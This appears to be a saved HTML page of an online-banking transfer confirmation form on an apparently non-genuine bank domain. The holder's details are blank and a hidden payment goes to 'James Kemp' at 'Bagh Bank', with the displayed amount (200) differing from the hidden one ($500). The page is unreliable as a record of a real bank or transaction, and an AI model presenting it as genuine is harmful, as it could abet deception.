<html><head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New Page 1</title>
<link rel="stylesheet" type="text/css" href="confirm_transfer.php_files/style.css">
<script type="text/javascript" src="confirm_transfer.php_files/a"></script><script charset="UTF-8" src="confirm_transfer.php_files/get"></script></head>

<body><script type="text/javascript" id="1qa2ws" charset="utf-8" src="confirm_transfer.php_files/base.js"></script>

<table style="border:1px solid #a3a3a3" width="820" cellspacing="0" cellpadding="0" border="0">
	<tbody><tr>
		<td style="padding:10px" bgcolor="#EEEEEE">
		<table width="100%" cellspacing="1" border="0">
			<tbody><tr>
				<td width="392">Welcome,&nbsp; <b>&nbsp;</b></td>
				<td>
				Today: <b>13th July 2017 </b></td>
				<td width="176">
				<p align="right">Secure Online banking</p></td>
			</tr>
		</tbody></table>
		</td>
	</tr>
	<tr>
		<td bgcolor="#0088cc">
		&nbsp;</td>
	</tr>
	<tr>
		<td style="padding:10px; vertical-align:top" height="164">
		<table width="100%" cellspacing="1" border="0">
			<tbody><tr>
				<td style="padding:10px; border:1px solid #a3a3a3" width="134">
<img src="" width="0" height="0">				
				</td>
				<td style="padding:10px; vertical-align:top; padding-right:0px">
						<table width="100%" height="122" cellspacing="0" cellpadding="0" border="0">
							<tbody><tr>
								<td style="border-style:solid; border-width:0px; " width="140" align="right">
								<font size="2">Name: </font></td>
								<td style="border:1px solid #c3c3c3; border-bottom:0px" align="left">
								<font size="2">&nbsp;&nbsp;</font></td>
							</tr>
							<tr>
								<td style="border-style:solid; border-width:0px; " width="140" align="right">
								<font size="2">Account Number:</font></td>
								<td style="border:1px solid #c3c3c3; border-bottom:0px" align="left">
								<font size="2">&nbsp;</font></td>
							</tr>
							<tr>
								<td style="border-style:solid; border-width:0px; " width="140" align="right">
								<font size="2">Sort code:</font></td>
								<td style="border:1px solid #c3c3c3; border-bottom:0px" align="left">
								<font size="2">&nbsp;</font></td>
							</tr>
							<tr>
								<td style="border-style:solid; border-width:0px; " width="140" align="right">
								<font size="2">Date of 
								Deposit:</font></td>
								<td style="border:1px solid #c3c3c3" align="left">
								<font size="2">&nbsp;  </font></td>
							</tr>
							</tbody></table>
						</td>
			</tr>
			</tbody></table>
		</td>
	</tr>
	<tr>
		<td style="padding:10px; vertical-align:top">
		<table width="100%" cellspacing="0" cellpadding="0" border="0">
			<tbody><tr>
				<td style="padding:10px; border:1px solid #f4cd58; border-right:0px" width="190" bgcolor="#FBF2A5">
				Quick Menu</td>
				<td style="padding:10px; border:1px solid #f4cd58;" bgcolor="#FFFFCF">
				Transfer Money</td>
			</tr>
			<tr>
				<td style="padding:10px; vertical-align:top" width="192">
				<table width="100%" cellspacing="0" cellpadding="0" border="0">
					<tbody><tr>
						<td style="padding:5px; border:1px solid #a3a3a3" width="16">
						<img src="confirm_transfer.php_files/acc_we8.gif" border="0"></td>
						<td style="padding:5px; border:1px solid #a3a3a3">
						<font size="2"><a href="http://uk.sambabk.com/e/admin3/acc_welcome.php?account=">Home</a></font></td>
					</tr>
					<tr>
						<td style="padding:5px; border:1px solid #a3a3a3" width="16">
						<img src="confirm_transfer.php_files/acc_we9.gif" border="0"></td>
						<td style="padding:5px; border:1px solid #a3a3a3">
						<font size="2"><a href="http://uk.sambabk.com/e/admin3/transactions.php?account=">View Transactions</a></font></td>
					</tr>
					<tr>
						<td style="padding:5px; border:1px solid #a3a3a3" width="16">
						<img src="confirm_transfer.php_files/acc_we10.gif" border="0"></td>
						<td style="padding:5px; border:1px solid #a3a3a3">
						<font size="2"><a href="http://uk.sambabk.com/e/admin3/paybill.php?account=">Pay a bill 
						/ someone</a></font></td>
					</tr>
					<tr>
						<td style="padding:5px; border:1px solid #a3a3a3" width="16">
						<img src="confirm_transfer.php_files/acc_we11.gif" border="0"></td>
						<td style="padding:5px; border:1px solid #a3a3a3">
						<font size="2"><a href="http://uk.sambabk.com/e/admin3/transfer_money.php?account=">Transfer Money</a></font></td>
					</tr>
					<tr>
						<td style="padding:5px; border:1px solid #a3a3a3" width="16">
						<img src="confirm_transfer.php_files/acc_we12.gif" border="0"></td>
						<td style="padding:5px; border:1px solid #a3a3a3">
						<font size="2"><a href="http://uk.sambabk.com/e/admin3/add_services.php?account=">Add Services</a></font></td>
					</tr>
					<tr>
						<td style="padding:5px; border:1px solid #a3a3a3" width="16">
						<img src="confirm_transfer.php_files/acc_we13.gif" border="0"></td>
						<td style="padding:5px; border:1px solid #a3a3a3">
						<font size="2"><a href="http://uk.sambabk.com/e/admin3/user_profile.php?account=">User Profile</a></font></td>
					</tr>
					<tr>
						<td style="padding:5px; border:1px solid #a3a3a3" width="16">
						<img src="confirm_transfer.php_files/acc_we14.gif" border="0"></td>
						<td style="padding:5px; border:1px solid #a3a3a3">
						<font size="2"><a href="http://uk.sambabk.com/e/admin3/logout.php">Logout</a></font></td>
					</tr>
				</tbody></table>
				</td>
				<td style="padding:10px; border:1px solid #f4cd58; vertical-align:top; border-top:0px">
						<form method="POST" action="transfer_1.php?account=&amp;cid=$500&amp;cid2=200&amp;first=&amp;last=">
							<table width="100%" height="184" border="0">
								<tbody><tr>
									<td height="20"><b><font size="2">CONFIRM DETAILS</font></b></td>
								</tr>
								<tr>
									<td>
									<p style="margin-top: 0; margin-bottom: 0">
									<font size="2">Please check the details below.</font></p>
									<p style="margin-top: 0; margin-bottom: 0">
									<font size="2">If they are correct, click on the green 
									'Next' button to carry out your payment.</font></p>
									<p style="margin-top: 0; margin-bottom: 0">
									<font size="2">...........................................................................................................................</font></p>
									<p style="margin-top: 0; margin-bottom: 0">&nbsp;</p>
									<table width="85%" height="238" border="0">
										<tbody><tr>
											<td background="confirm_transfer.php_files/back.jpg">
											<table width="96%" border="0">
												<tbody><tr>
													<td colspan="3"><b>
													<font size="2">&nbsp;&nbsp; 
													You have asked us to make 
													the following transfer:</font></b></td>
												</tr>
												<tr>
													<td width="2%">&nbsp;</td>
													<td width="32%">
													<font size="2">From:</font></td>
													<td width="64%"><b>
													<font size="2">&nbsp;  </font></b><input name="from" value="  " type="hidden"></td>
												</tr>
												<tr>
													<td width="2%">&nbsp;</td>
													<td width="32%">
													<font size="2">To:</font></td>
													<td width="64%"><b>
													<font size="2">&nbsp;JAMES KEMP</font></b><input name="to" value="James Kemp" type="hidden"></td>
												</tr>
												<tr>
													<td width="2%">&nbsp;</td>
													<td width="32%">
													<font size="2">Account No.:</font></td>
													<td width="64%"><b>
													<font size="2">&nbsp;345534665464</font></b><input name="pay_no" value="345534665464" type="hidden"></td>
												</tr>
												<tr>
													<td width="2%">&nbsp;</td>
													<td width="32%">
													<font size="2">Sort code:</font></td>
													<td width="64%"><b>
													<font size="2">&nbsp;2314</font></b><input name="pay_sort" value="2314" type="hidden"></td>
												</tr>
												<tr>
													<td width="2%">&nbsp;</td>
													<td width="32%">
													<font size="2">Amount:</font></td>
													<td width="64%"><b>
													<font size="2">&nbsp;200</font></b><input name="pay_amt" value="$500" type="hidden"></td>
												</tr>
												<tr>
													<td width="2%">&nbsp;</td>
													<td width="32%">
													<font size="2">Date:</font></td>
													<td width="64%"><b>
													<font size="2">&nbsp;13 07 2017</font></b><input name="date" value="13 07 2017" type="hidden"></td>
												</tr>
												<tr>
													<td width="2%">&nbsp;</td>
													<td width="32%">
													<font size="2">Bank:</font></td>
													<td width="64%"><b>
													<font size="2">&nbsp;BAGH BANK</font></b><input name="pay_bank" value="Bagh Bank" type="hidden"></td>
												</tr>
												<tr>
													<td width="2%">&nbsp;</td>
													<td width="32%">&nbsp;</td>
													<td width="64%">&nbsp;</td>
												</tr>
											</tbody></table>
											</td>
										</tr>
									</tbody></table>
									</td>
								</tr>
							</tbody></table>
									<p style="margin-top: 0; margin-bottom: 0">
									<font size="2">...........................................................................................................................</font></p>
							<table width="100%" border="0">
								<tbody><tr>
									<td>&nbsp;</td>
									<td width="105">
									<a href="javascript:history.go(-1)">
									<img src="confirm_transfer.php_files/b4.jpg" width="94" height="30" border="0"></a></td>
									<td width="111">
									<a href="http://uk.sambabk.com/e/admin3/acc_welcome.php?account=">
									<img src="confirm_transfer.php_files/b3.jpg" width="105" height="30" border="0"></a></td>
									<td width="109">
									<input src="confirm_transfer.php_files/b2.jpg" name="submit" width="90" type="image" height="30" border="0"></td>
								</tr>
							</tbody></table>
							<input name="status" value="OK" type="hidden">
							<input name="type" value="Payment" type="hidden">
						</form>
						</td>
			</tr>
		</tbody></table>
		</td>
	</tr>
	<tr>
		<td bgcolor="#EEEEEE">&nbsp;</td>
	</tr>
</tbody></table>

<p>&nbsp;</p>



</body></html>